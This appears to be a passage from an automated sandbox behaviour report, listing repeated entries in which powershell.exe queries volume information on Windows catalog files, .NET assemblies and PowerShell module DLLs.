        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
